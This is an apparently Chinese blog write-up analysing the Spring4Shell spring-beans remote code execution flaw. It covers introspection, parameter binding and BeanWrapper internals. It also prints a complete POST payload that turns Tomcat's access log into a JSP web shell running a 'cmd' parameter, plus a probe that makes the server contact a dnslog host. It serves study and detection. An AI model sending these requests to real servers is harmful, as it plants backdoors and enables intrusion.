有点乱
spring-beans RCE
漏洞概述
漏洞概述
该漏洞的本质类似于变量覆盖漏洞,利用变量覆盖,修改tomcat的配置,并修改tomcat的日志位置到根目录,修改日志的后缀为jsp,达到木马文件写入的效果
值得一提的是该漏洞是CVE-2010-1622的绕过,详情可以参考 http://rui0.cn/archives/1158
影响范围
spring-beans版本5.3.0 ~ 5.3.17、5.2.0 ~ 5.2.19JDK 9+Apache Tomcat- 传参时使用
参数绑定,且为非基础数据类型
漏洞核心
该漏洞的关键点,在于JDK内省机制以及Spring属性注入,在后文中都有详细的解析
内省机制
JavaBean
什么是JavaBean
- JavaBean是一种特殊的类,其内部没有功能性方法,主要包含信息字段和存储方法,因此JavaBean通常用于传递数据信息
- JavaBean类中的方法用于访问私有的字段,且方法名符合一定的命名规则
一般来说满足如下条件的,可以称为一个JavaBean
- 所有属性为
private - 提供默认的无参构造方法
- 提供
setter&getter方法,让外部可以设置&获取JavaBean的属性
JavaBean的命名规则
- JavaBean中的方法,去掉set/get前缀,剩下的就是属性名
method: getName() --> property: name
- 去掉前缀,剩下的部分中第二个字母是大写/小写,则剩下的部分应全部大写/小写
getSEX()
JavaBean内省
一个类被当作javaBean使用时,JavaBean的属性是根据方法名推断出来的,使用它的程序看不到JavaBean内部的成员变量
内省即:当一个类是满足JavaBean条件时,就可以使用特定的方式,来获取和设置JavaBean中的属性值
API
Java中提供了一套API来访问某个属性的setter/getter方法,一般的做法是通过Introspector.getBeanInfo()方法来获取某个对象的BeanInfo ,然后通过 BeanInfo来获取属性的描述器PropertyDescriptor,通过PropertyDescriptor就可以获取某个属性对应的getter/setter方法,然后通过反射机制来调用这些方法。
Introspector
除了JDK的Introspector,还有Apache BeanUtils,这里仅介绍前者
Introspector类位于java.beans包下
Introspector api
该类中的主要方法getBeanInfo都是静态方法
// 获取 beanClass 及其所有父类的 BeanInfo
BeanInfo getBeanInfo(Class<?> beanClass)
// 获取 beanClass 及其指定到父类 stopClass 的 BeanInfo
BeanInfo getBeanInfo(Class<?> beanClass, Class<?> stopClass)
beaninfo api
// bean 信息
BeanDescriptor beanDescriptor = beanInfo.getBeanDescriptor();
// 属性信息
PropertyDescriptor[] propertyDescriptors = beanInfo.getPropertyDescriptors();
// 方法信息
MethodDescriptor[] methodDescriptors = beanInfo.getMethodDescriptors();
demo
有这样一个JavaBean,尝试用Introspector来获取其属性
UserInfo
public class UserInfo {
private String id;
private String name;
public String getSex() { return null; }
public String getId() { return id; }
public void setId(String id) { this.id = id; }
public String getName() { return name; }
public void setName(String name) { this.name = name; }
}
IntrospectorTest
这里调用Introspector.getBeanInfo,不使用带有stopClass的重载方法,会让JDK连父类一并进行内省操作
public class IntrospectorTest {
public static void main(String[] args) throws IntrospectionException {
BeanInfo beanInfo = Introspector.getBeanInfo(UserInfo.class);
PropertyDescriptor[] propertyDescriptors = beanInfo.getPropertyDescriptors();
for (PropertyDescriptor propertyDescriptor : propertyDescriptors) {
System.out.println("Property: " + propertyDescriptor.getName());
}
}
}
output
Property:class
Property:id
Property:name
Property:sex
预期内的结果
- id (有getter方法)
- name (有getter方法)
- sex (虽然没有该属性,但是有getter方法,内省机制就会认为存在sex属性)
非预期内的结果
- class
这里出现了一个非常有意思的点,也是导致整个漏洞的关键因素之一,为什么会出现class呢
因为在Java中,所有的类都会默认继承Object类
而在Object中,又存在一个getClass()方法,内省机制就会认为存在一个class属性
尝试再获取class属性的beaninfo
Introspector.getBeanInfo(Class.class);
Property:annotatedInterfaces
Property:annotatedSuperclass
Property:annotation
Property:annotations
Property:anonymousClass
Property:array
Property:canonicalName
Property:class
Property:classLoader
Property:classes
Property:componentType
Property:constructors
Property:declaredAnnotations
Property:declaredClasses
......
已经可以看到熟悉的classLoader了
参数绑定
该漏洞的原理类似变量覆盖漏洞,通过传参修改tomcat日志的路径以及后缀等,本质其实是SpringMVC的参数绑定
简单介绍一下SpringMVC的参数绑定
基本类型、包装类型
基本类型int
@RequestMapping("/index")
@ResponseBody
public String baseType(int age) {
return "age: " + age;
}
http://localhost:8080/index?age=8
包装类型
@RequestMapping("/index")
@ResponseBody
public String packingType(Integer age) {
return "age: " + age;
}
包装类型主要是为了规避参数为空的问题,因为其不传值就赋null,但是int类型却不能为null
对象
多层级对象
public class UserInfo {
private Integer age;
private String address;
......补充其 get set toString 方法
}
在 User 类中引入这个类,这种情况该如何绑定参数呢
public class User {
private String id;
private String name;
private UserInfo userInfo;
}
http://localhost:8080/index?id=1&name=Steven&userInfo.age=20&userInfo.address=BeiJing
同属性对象
如果我们想要直接接收两个对象,有时候免不了有相同的成员,例如我们的User和Student类中均含有
id 、name两个成员,我们试着请求一下
@RequestMapping("/index")
@ResponseBody
public String objectType2(User user, Student student) {
return user.toString() + " " + student.toString();
}
http://localhost:8080/index?id=0&name=t4r
返回结果:User{id='0', name='t4r'} Student{id='0', name='t4r'}
可以看到,两个对象的值都被赋上了,但是,大部分情况下,不同的对象的值一般都是不同的,为此,我们还有解决办法
@InitBinder 注解可以帮助我们分开绑定,下面的代码也就是说分别给user、student指定一个前缀
@InitBinder("user")
public void initUser(WebDataBinder binder) {
binder.setFieldDefaultPrefix("user.");
}
@InitBinder("student")
public void initStudent(WebDataBinder binder) {
binder.setFieldDefaultPrefix("stu.");
}
http://localhost:8080/index?user.id=1&name=t4r&stu.id=002
数组
@RequestMapping("/index")
@ResponseBody
public String arrayType(String[] name) {
StringBuilder sb = new StringBuilder();
for (String s : nickname) {
sb.append(s).append(", ");
}
return sb.toString();
}
http://localhost:8080/index?name=Alice&name=Bob
返回结果:Alice, Bob
集合
List类型
集合是不能直接进行参数绑定的,所以我们需要创建出一个类,然后在类中进行对List的参数绑定
控制层方法中,参数就是这个创建出来的类
@RequestMapping("/index")
@ResponseBody
public String listType(UserList userList) {
return userList.toString();
}
http://localhost:8080/index?users[0].id=1&users[0].name=Alice&users[1].id=2&users[1].name=Bob
如果Tomcat版本是高于7的 ,执行上述请求就会报400错误
这是因为Tomcat高的版本地址中不能使用[和] ,我们可以将其换成对应的16进制,即 [ 换成 %5B,] 换成%5D
或者直接用post请求也可以
Map类型
map 类型是一样的套路,我们先创建一个 UserMap类,然后在其中声明 private Map<String,User> users 进而绑定参数
@RequestMapping("/index")
@ResponseBody
public String mapType(UserMap userMap) {
return userMap.toString();
}
同样 [] 会遇到上面的错误,所以如果想要在地址栏请求访问,就需要替换字符,或者发起一个post请求
属性注入
BeanWrapper
PropertyEditorRegistryPropertyEditor 注册、查找TypeConverter类型转换,其主要的工作由 TypeConverterDelegate 这个类完成的PropertyAccessor属性读写ConfigurablePropertyAccessor配置一些属性,如设置ConversionService、是否暴露旧值、嵌套注入时属性为 null 是否自动创建BeanWrapper对 bean 进行封装AbstractNestablePropertyAccessor实现了对嵌套属性注入的处理
获取BeanWrapper实例
从上图可知,获取BeanWrapper实例可以通过其唯一实现类BeanWrapperImpl获取
BeanWrapper beanWrapper = new BeanWrapperImpl(对象);
属性注入
beanWrapper.setPropertyValue(属性名, 属性值);
beanWrapper.setPropertyValue("name", "t4r");
也可以通过PropertyValue
PropertyValue propertyValue = new PropertyValue("age", "80");
beanWrapper.setPropertyValue(propertyValue);
上述代码可以将属性值自动转换为适配的数据类型,过程如下
下图是跟踪BeanWrapperImpl#setPropertyValue(实际调用的就是父类AbstractNestablePropertyAccessor#setPropertyValue)到AbstractNestablePropertyAccessor#processLocalProperty的代码
可以总结一下processLocalProperty函数主要做了两件事:
- 类型转换:
convertForProperty利用JDK的PropertyEditorSupport进行类型转换 - 属性设置:
setValue使用反射进行赋值,BeanWrapperImpl#BeanPropertyHandler#setValue
setValue最终通过反射进行属性赋值,如下
嵌套属性注入
autoGrowNestedPaths=true 时当属性为 null 时自动创建对象
beanWrapper.setAutoGrowNestedPaths(true);
beanWrapper.setPropertyValue("director.name", "director");
beanWrapper.setPropertyValue("employees[0].name", "t4r");获取类实例
Person person = (Person) beanWrapper.getWrappedInstance();
获取对象属性
String name = (String) beanWrapper.getPropertyValue("name");AbstractNestablePropertyAccessor
BeanWrapper 有两个核心的实现类
AbstractNestablePropertyAccessor提供对嵌套属性的支持BeanWrapperImpl提供对 JavaBean 的内省功能,如PropertyDescriptor
上面已经简单介绍过了BeanWrapperImpl
而在Spring-framework 4.2之后,AbstractNestablePropertyAccessor将原BeanWrapperImpl的功能抽出,BeanWrapperImpl只提供对JavaBean的内省功能,所以很多老哥看CVE-2010-1622的分析时可能会比较疑惑
核心成员属性
Object wrappedObject:被BeanWrapper包装的对象String nestedPath:当前BeanWrapper对象所属嵌套层次的属性名,最顶层的BeanWrapper的nestedPath的值为空Object rootObject:最顶层BeanWrapper所包装的对象Map<String, AbstractNestablePropertyAccessor> nestedPropertyAccessors:缓存当前BeanWrapper的嵌套属性的nestedPath和对应的BeanWrapperImpl对象
getPropertyAccessorForPropertyPath
getPropertyAccessorForPropertyPath根据属性(propertyPath)获取所在bean的包装对象beanWrapper,如果是类似class.module.classLoader的嵌套属性,则需要递归获取。真正获取指定属性的包装对象则由方法getNestedPropertyAccessor完成
该函数内的具体操作,以属性class.module.classLoader为例
- 获取第一个
.之前的属性部分 递归处理嵌套属性- 先获取
class属性所在类的rootBeanWrapper - 再获取
module属性所在类的classBeanWrapper - 以此类推,获取最后一个属性classLoader属性所在类的
moduleBeanWrapper
- 先获取
getPropertyAccessorForPropertyPath处理属性有两种情况:
- class(不包含
.):直接范围当前bean的包装对象 - class.module.classLoader(包含
.):从当前对象开始递归查找,查找当前beanWrapper指定属性的包装对象由getNestedPropertyAccessor()完成
getNestedPropertyAccessor函数中的主要工作如下:
nestedPropertyAccessors用于缓存已经查找到过的属性getPropertyNameTokens获取属性对应的token值,主要用于解循环嵌套属性- 属性不存在则根据
autoGrowNestedPaths决定是否自动创建 - 先从缓存中获取,没有就创建一个新的
AbstractNestablePropertyAccessor对象
PropertyTokenHolder
- 用于解析嵌套属性名称
PropertyHandler
PropertyHandler的默认实现是BeanPropertyHandler,位于BeanWrapperImpl内BeanPropertyHandler是对PropertyDescriptor的封装,提供了对JavaBean底层的操作,如属性的读写
setPropertyValue
该函数内的主要操作如下
- 调用
getPropertyAccessorForPropertyPath递归获取propertyName属性所在的beanWrapper - 获取属性的
token,token用于标记该次属性注入是简单属性注入,还是Array、Map、List、Set复杂类型的属性注入 - 设置属性值
getPropertyValue
- 顾名思义,根据属性名称获取对应的值
- 通过反射完成
setDefaultValue
autoGrowNestedPaths=true时会创建默认的对象创建对象的操作会由
setDefaultValue调用其无参构造方法完成
漏洞分析
漏洞复现
IDEA创建一个SpringMVC项目,搭建过程不赘述
web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<servlet>
<servlet-name>springMVC</servlet-name>
<servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
<init-param>
<param-name>contextConfigLocation</param-name>
<param-value>WEB-INF/springMVC.xml</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>springMVC</servlet-name>
<url-pattern>/</url-pattern>
</servlet-mapping>
</web-app>
springMVC.xml
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:context="http://www.springframework.org/schema/context"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://www.springframework.org/schema/context https://www.springframework.org/schema/context/spring-context.xsd">
<bean class="org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping" />
<bean class="org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter" />
<bean class="org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping"/>
<bean class="org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter"/>
<context:component-scan base-package="com.example.springshell.controller"/>
</beans>
maven
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-beans</artifactId>
<version>5.3.17</version>
</dependency>
Controller
package com.example.springshell.controller;
import com.example.springshell.bean.Person;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class TestController {
@RequestMapping("/hello")
public String hello(Person person){
return person.getName();
}
}
JavaBean
package com.example.springshell.bean;
public class Person{
private String name;
private int age;
public int getAge(){
return age;
}
public String getName(){
return name;
}
public void setAge(int age){
this.age = age;
}
public void setName(String name){
this.name = name;
}
}
payload
POST /hello HTTP/1.1
Host: localhost:8082
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.10.128:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=EDD95D704336C807D0EB1A404D1D1BB9
Connection: close
suffix: %>
prefix: <%
Content-Length: 679
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25{prefix}ijava.io.InputStream+in+%3d+Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()%3bint+a+%3d+-1%3bbyte[]+b+%3d+new+byte[4096]%3bout.print("</pre>")%3bwhile((a%3din.read(b))!%3d-1){+out.println(new+String(b))%3b+}out.print("</pre>")%3b%25{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/t4rrega/Desktop/&class.module.classLoader.resources.context.parent.pipeline.first.prefix=bean-rce&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
断点分析
在有了上文的属性注入基础后,再来分析漏洞过程,就显得格外清晰了
上文中提到Spring-framework 4.2之后由AbstractNestablePropertyAccessor来完成嵌套输入注入的支持
在AbstractNestablePropertyAccessor#setPropertyValue处设置断点,根据设置的控制器路由,发送上述的http请求,触发断点(断点的位置已经是完成了参数绑定后的位置,参数绑定主要是通过DataBinder完成,该操作不是漏洞的关键点,略过)
可以看到函数的入参是pv,我们追溯一下,可以发现AbstractPropertyAccessor#setPropertyValues通过for循环,对请求中的每一个键值对,调用AbstractNestablePropertyAccessor#setPropertyValue进行属性注入操作
回到AbstractNestablePropertyAccessor#setPropertyValue,分析一下该函数做的事:
- 创建了一个
PropertyTokenHolder对象,上文中也提到,用于解析嵌套属性名称 - 属性名存在则创建一个
AbstractNestablePropertyAccessor对象,并调用getPropertyAccessorForPropertyPath
此时的propertyName为class.module.classLoader.resources.context.parent.pipeline.first.directory,跟入getPropertyAccessorForPropertyPath
在getPropertyAccessorForPropertyPath中,正如前文所说,通过递归的方式,获取嵌套属性的包装对象beanWrapper
这里首先会通过getFirstNestedPropertySeparatorIndex拿到.前的一个属性,拿到class属性后,调用getNestedPropertyAccessor
该函数中:
- 创建了一个缓存列表,在后续操作中,判断获取的属性是否已经在列表中,如在则直接获取,否则会新创建一个
AbstractNestablePropertyAccessor - 创建了一个
PropertyTokenHolder,之后调用getPropertyValue处理它
简单提一下,这里的缓存列表结构如下,可以发现嵌套的属性
在AbstractNestablePropertyAccessor#getPropertyValue中又调用getLocalPropertyHandler处理传入的PropertyTokenHolder中的actualName(即class)
AbstractNestablePropertyAccessor中的getLocalPropertyHandler是一个抽象方法,其唯一子类BeanWrapperImpl重写了该方法,跟入该方法
调用了CachedIntrospectionResults#getPropertyDescriptor
而真正的逻辑在其构造方法中,看到了我们熟悉的getBeanInfo
这里也就解释了我们为什么能获取到class这个属性值,因此其没用调用另一个有stopclass参数的重载方法
到此,算是完成了获取class这个参数的beanWrapper
回到AbstractNestablePropertyAccessor.setPropertyValue
接着会调用重载的方法,进行属性的注入
又调用了processLocalProperty
processLocalProperty函数之前也提到过,完成了类型转换以及调用BeanWrapperImpl#setValue通过反射完成了最终的属性注入
绕过
在CachedIntrospectionResults的构造方法中,可以看到对beanClass以及属性名做了判断
beanClass非class- 属性名非
classLoader或protectionDomain
显然Class.getClassLoader被拦截了
但是Java9新增了module,可以通过Class.getModule方法调用getClassloader的方式继续访问更多对象的属性
Payload
在调试过程中,发现了payload中的
class.module.classLoader.resources.context.parent.pipeline.first
context对应StandardContextparent对应StandardHostpipeline对应StandardPipelinefirst对应AccessLogValve
因此,公开的利用链也就是利用AccessLogValve,这个类用来设置tomcat得日志存储参数,修改参数可以达到文件写入的效果
payload中
suffix: %>
prefix: <%
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25{prefix}ijava.io.InputStream+in+%3d+Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()%3bint+a+%3d+-1%3bbyte[]+b+%3d+new+byte[4096]%3bout.print("</pre>")%3bwhile((a%3din.read(b))!%3d-1){+out.println(new+String(b))%3b+}out.print("</pre>")%3b%25{suffix}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/t4rrega/Desktop/&class.module.classLoader.resources.context.parent.pipeline.first.prefix=bean-rce&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
由于%会被过滤,pattern里通过引用头部来实现构造
%{x}i可引用请求头字段
%{x}i 请求headers的信息
%{x}o 响应headers的信息
%{x}c 请求cookie的信息
%{x}r xxx是ServletRequest的一个属性
%{x}s xxx是HttpSession的一个属性此外StandardContext中的configFile可发送http请求,可以用于漏洞的检测
发送如下请求
POST /springshell_war_exploded/hello HTTP/1.1
Host: localhost:8082
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.10.128:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=EDD95D704336C807D0EB1A404D1D1BB9
Connection: close
Content-Length: 163
class.module.classLoader.resources.context.configFile=http://test.9vvyp3.dnslog.cn&class.module.classLoader.resources.context.configFile.content.config=config.confDNS记录
参考文章
点击收藏 | 1
关注 | 1
打赏
